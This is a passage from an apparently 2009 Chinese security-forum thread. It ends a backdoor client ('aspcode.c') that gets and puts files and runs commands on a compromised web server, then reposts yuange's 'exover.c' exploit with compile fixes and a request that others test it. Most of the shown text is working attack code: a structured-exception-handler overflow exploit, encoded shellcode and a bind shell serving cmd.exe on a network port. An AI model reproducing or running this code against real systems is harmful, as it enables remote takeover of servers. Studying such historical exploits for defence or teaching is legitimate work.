   buff[i]^=lockcharvar; // DATAXORCODE;
   }

   }
   else{
         if(k>0){
            buff[k]=0;
            if(strstr(buff,"XORDATA")!=0) {
   xordatabegin=1;
   for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
   lockintvar1=lockintvar1*0x100;
   lockintvar1=lockintvar1%LOCKBIGNUM;
   lockcharvar=lockintvar1%0x100;
   buff[i]^=lockcharvar; // DATAXORCODE;
   }
            }
   }

   }
   return(k);
}
int newsend(int fd,char *buff,int size,int flag){
   int i;

   for(i=0;i<size;++i){
   lockintvar2=lockintvar2*0x100;
   lockintvar2=lockintvar2%LOCKBIGNUM;
   lockcharvar=lockintvar2%0x100;
   buff[i]^=lockcharvar; // DATAXORCODE;
   //             buff[i]^=DATAXORCODE;
   }
   return(send(fd,buff,size,flag));
}
void iishelp(){
   printf("\nusage:");
   printf("\niisget filename filename.  get file from web server.");
   printf("\niisput filename filename.  put file to web server.");
   printf("\niiscmd cmd.  run cmd on web server.");
   printf("\niisreset.  reset the xor data.");
   printf("\niisdie.  reset the asp door.");
   printf("\n\n");
}

2009-10-6 16:48

0

jeffcjh

雪币： 58

活跃值： (28)

能力值：

( LV2，RANK：10 )

在线值：

发帖

2

回帖

267

粉丝

0

关注

私信

jeffcjh: 3 楼

aspcode.c编译可以通过，但能否实现攻击功能，请测试一下。

2009-10-6 16:49

0

jeffcjh

雪币： 58

活跃值： (28)

能力值：

( LV2，RANK：10 )

在线值：

发帖

2

回帖

267

粉丝

0

关注

私信

jeffcjh: 4 楼

网址http://www.nsfocus.net/index.php?act=magazine&do=view&mid=682
包含两个独立的源程序代码：except.c和exover.c，分别是存在漏洞的程序和攻击程序。

对于except.c，欲成功编译，需要加上ws2_32.lib库文件的支持，加在#include头文件之后，即：
#include <windows.h>
#include <winsock.h>
#include <stdio.h>

// 增加对ws2_32.lib库文件的支持
#pragma comment (lib, "ws2_32.lib")

int main(int argc, char **argv)

而对exover.c，需要作如下修改：
1、增加
#pragma comment (lib, "ws2_32.lib")
2、将某些被回车换行符割断的变量名和代码行接到一行上（看VC提示哪行报错，转到那行就明白了）
3、代码段
_asm {
mov ESI,ESP
cmp ESI,ESP
}
前的大括号}是多余的，必须去掉

修改后的代码如下供参考，同样编译通过，但能否事先袁哥所说的攻击请测试一下：

/*
利用异常结构绕过溢出保护攻击的攻击程序exover.c。
上面程序运行在win2000下此攻击程序溢出成功。
vc6.0下编译通过。
yuange@nsfocus.com
*/

/*
except overflow program ver 1.0
copy by yuange <yuange@163.net>  2000。06。20
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

#pragma comment (lib, "ws2_32.lib")

#define  FNENDLONG    0x08
#define  NOPCODE 0x90
#define  NOPLONG    0x20
#define  BUFFSIZE    0x20000
#define  RETEIPADDRESS 0x0
#define  SHELLPORT    0x1f90
/* 0x1f90=8080 */
#define  WEBPORT    1080

void    shellcodefnlock();
void    shellcodefn();

void    cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

int main(int argc, char **argv)
{
char *server;
char *str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"wsock32.dll""\x0""socket""\x0"
"bind""\x0""listen""\x0"
"accept""\x0""send""\x0"
"recv""\x0""ioctlsocket""\x0"
"closesocket""\x0"
"cmd.exe""\x0""exit\x0d\x0a""\x0"
"strend";
/*  shellcode用到的api名等字符串 */

char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char  eipwinnt[]="\x63\x0d\xfa\x7f";
/* jmp ebx  address */
/*
win2000发生异常时ebx指向异常结构，
winnt 有的版本是esi,有的版本是edi
*/
char  JMPNEXTJMP[]="\x90\x90\x90\x2d";
/*
0x2d  sub eax,num32
用于平衡后面的4字节任意代码，使得连续覆盖溢出点的这段代码指令等效于NOP
*/
char  JMPSHELL[]="\xe9\x40\xf0\xff\xff";

char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct  sockaddr_in s_in2,s_in3;
struct  hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned  int sendpacketlong;
int i,j,k;
unsigned  char temp;
int    fd;
u_short port,port1,shellcodeport;
SOCKET  d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int OVERADD2=0xfb8;
int result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}

if(argc>3)  port=atoi(argv[3]);
else  port=WEBPORT;

if(argc <2){
WSACleanup( );
fprintf(stderr, "\n except over 1.0.");
fprintf(stderr, "\n copy by yuange 2000.06.20.");
fprintf(stderr, "\n welcome to my homepage http://yuange.yeah.net.");
fprintf(stderr, "\n usage: %s <server> [shellport] [webport] \n", argv[0]);
exit(1);
}
else  server = argv[1];
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}

fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));

s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));

if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)

closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n  connect err.");
exit(1);
//}

__asm {
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}

shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}

for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}

memset(buff,NOPCODE,BUFFSIZE);
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);

shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}

for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}

memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);

for (i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);

if(argc>2)  shellcodeport=atoi(argv[2]);
else       shellcodeport=SHELLPORT;

if(shellcodeport==0) shellcodeport=SHELLPORT;
shellcodeport=htons(shellcodeport);
*(u_short *)(shellcodebuff+k)=shellcodeport;
fprintf(stderr,"\n shellport %d",htons(shellcodeport));

sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}

for(i=0;i<sendpacketlong;++i){
temp=shellcodebuff[i];
if(temp<=0x10||temp=='0'){
/* 对shellcode的特殊字符编码 */
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}

for(i=-0x30;i<0x20;i+=8){
memcpy(buff+OVERADD2+i,JMPNEXTJMP,4);
/*
覆盖异常结构的下一个异常链next数据，发生异常时ebx制向这
与通常的发生溢出时ESP指向溢出代码附近不一样，发生异常时
的ESP不在这附近
*/
memcpy(buff+OVERADD2+i+4,eipwinnt,4);
/*
覆盖异常结构的程序指针
发生异常时会转到这指针去运行
这覆盖的是一个jmp ebx指令的地址
*/
}
/*
连续覆盖，增大覆盖掉异常结构的可能性
*/
memcpy(buff+OVERADD2+8,JMPSHELL,5);
/*
跳到shellcode去的跳转代码，远跳转。
*/
sendpacketlong=0x1000-0x10;

for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send  packet %d bytes.",j);
send(fd,buff,j,0);
k=recv(fd,recvbuff,0x1000,0);
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n  recv:\n %s",recvbuff);
}
}
closesocket(fd);
WSACleanup( );
return(0);
}

void  shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
/* 用于定位下面一小段汇编指令的NOP 串 */
jmp next
getediadd: pop EDI
   push  EDI
   pop ESI
   xor ecx,ecx
   mov cx,0x0fd0
looplock:       lodsb
   cmp al,0x30
   jnz sto
               lodsb
   sub al,0x40
sto:             stosb
   loop  looplock
   jmp shell
next:          call  getediadd
   /*  解码shellcode */
shell:    NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP

}
}

/* 真正实现功能的shellcode */
/* 本shellcode实现开端口绑定cmd.exe 的功能 */
void shellcodefn()
{ char       Buff[0x800];
int       *except[3];

FARPROC    closesocketadd;
FARPROC    ioctlsocketadd;
FARPROC    recvadd;
FARPROC    sendadd;
FARPROC    acceptadd;
FARPROC    listenadd;
FARPROC    bindadd;
FARPROC    socketadd;
/*    FARPROC    WSAStartupadd;  */

FARPROC    NOPNOP;

FARPROC    WriteFileadd;
FARPROC    ReadFileadd;
FARPROC    PeekNamedPipeadd;
FARPROC    CloseHandleadd;
FARPROC    CreateProcessadd;
FARPROC    CreatePipeadd;
FARPROC  procloadlib;

FARPROC    apifnadd[1];
FARPROC    procgetadd=0;

char       *stradd;
int       imgbase,fnbase,k,l;
HANDLE    libhandle;
STARTUPINFO siinfo;
SOCKET    listenFD,clientFD;
struct    sockaddr_in server;
int       iAddrSize = sizeof(server);
int       lBytesRead;
u_short    shellcodeport;

PROCESS_INFORMATION ProcessInformation;
HANDLE    hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
SECURITY_ATTRIBUTES sa;
_asm {    jmp nextcall
getstradd: pop stradd
   lea EDI,except
   mov eax,dword ptr FS:[0]
   mov dword ptr [edi+0x08],eax
   mov dword ptr FS:[0],EDI

}
except[0]=0xffffffff;
except[1]=stradd-0x07;

imgbase=0x77e00000;
_asm{
call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int
*)k)=='Acor'){
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
/*
搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
注意这儿处理了搜索页面不在情况。
*/

_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}

if(procgetadd==0) goto  die ;

shellcodeport=*(u_short *)stradd;
stradd+=2;
for(k=1;k<17;++k) {
if(k==8) libhandle=procloadlib(stradd);
else    apifnadd[k]=procgetadd(libhandle,stradd);
for(;;++stradd){
if(*(stradd)==0&&*(stradd+1)!=0) break;
}
++stradd;
}

/* WSAStartupadd(MAKEWORD(1, 1), &wsaData);  */
listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port =shellcodeport;
server.sin_addr.s_addr=0;

k=1;
while(k!=0){
k=bindadd(listenFD,&server,sizeof(server));
server.sin_port+=0x100;
if(server.sin_port<0x100) ++server.sin_port;
}
listenadd(listenFD,10);

while(1){

clientFD=acceptadd(listenFD,&server,&iAddrSize);
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;

CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);

/* ZeroMemory(&siinfo,sizeof(siinfo));  */
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;

k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);

PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);

/*
k=1;
ioctlsocketadd(clientFD, FIONBIO, &k);
*/
/*
还是阻塞模式比较好，占用CPU时间少，要不下面死掉的时候就老占用CPU，
造成受攻击系统反应比较慢。
*/
while(1){
      PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);
if(lBytesRead>0) {
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0);
else sendadd(clientFD,stradd,8,0);
}
else{
lBytesRead=recvadd(clientFD,Buff,1024,0);
if(lBytesRead<=0){
lBytesRead=6;
WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0);
closesocketadd(clientFD);
break;
/*
TELNET连接中断，退出等到再一次连接
*/       }
else{
sendadd(clientFD,Buff,lBytesRead,0);
/*
回显，有些TELNET不能设置本地响应会看不到命令输入很不方便。
*/
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
}
}
}
}

die: goto die  ;
   _asm{

getexceptretadd: pop  eax
   push eax
   mov  edi,dword ptr [stradd]
   mov dword ptr [edi-0x0e],eax
   ret
errprogram:       mov eax,dword ptr [esp+0x0c]
   add eax,0xb8
   mov dword ptr [eax],0x11223344
   /* stradd-0xe  */
   xor eax,eax
   /* 2  bytes */
   ret
   /* 1  bytes */
execptprogram:    jmp errprogram
   /* 2 bytes  stradd-7  */
nextcall:       call getstradd
   /* 5 bytes */
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   }
}

/*
清除shellcdoe里面的chkesp调用
*/
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;

for(i=0;i<len;++i){
temp=shellbuff[i];
if(temp==0xe8){
k=*(int *)(shellbuff+i+1);
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43; // inc ebx
shellbuff[i+2]=0x4b; // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
      }
}
}

2009-10-6 17:07

0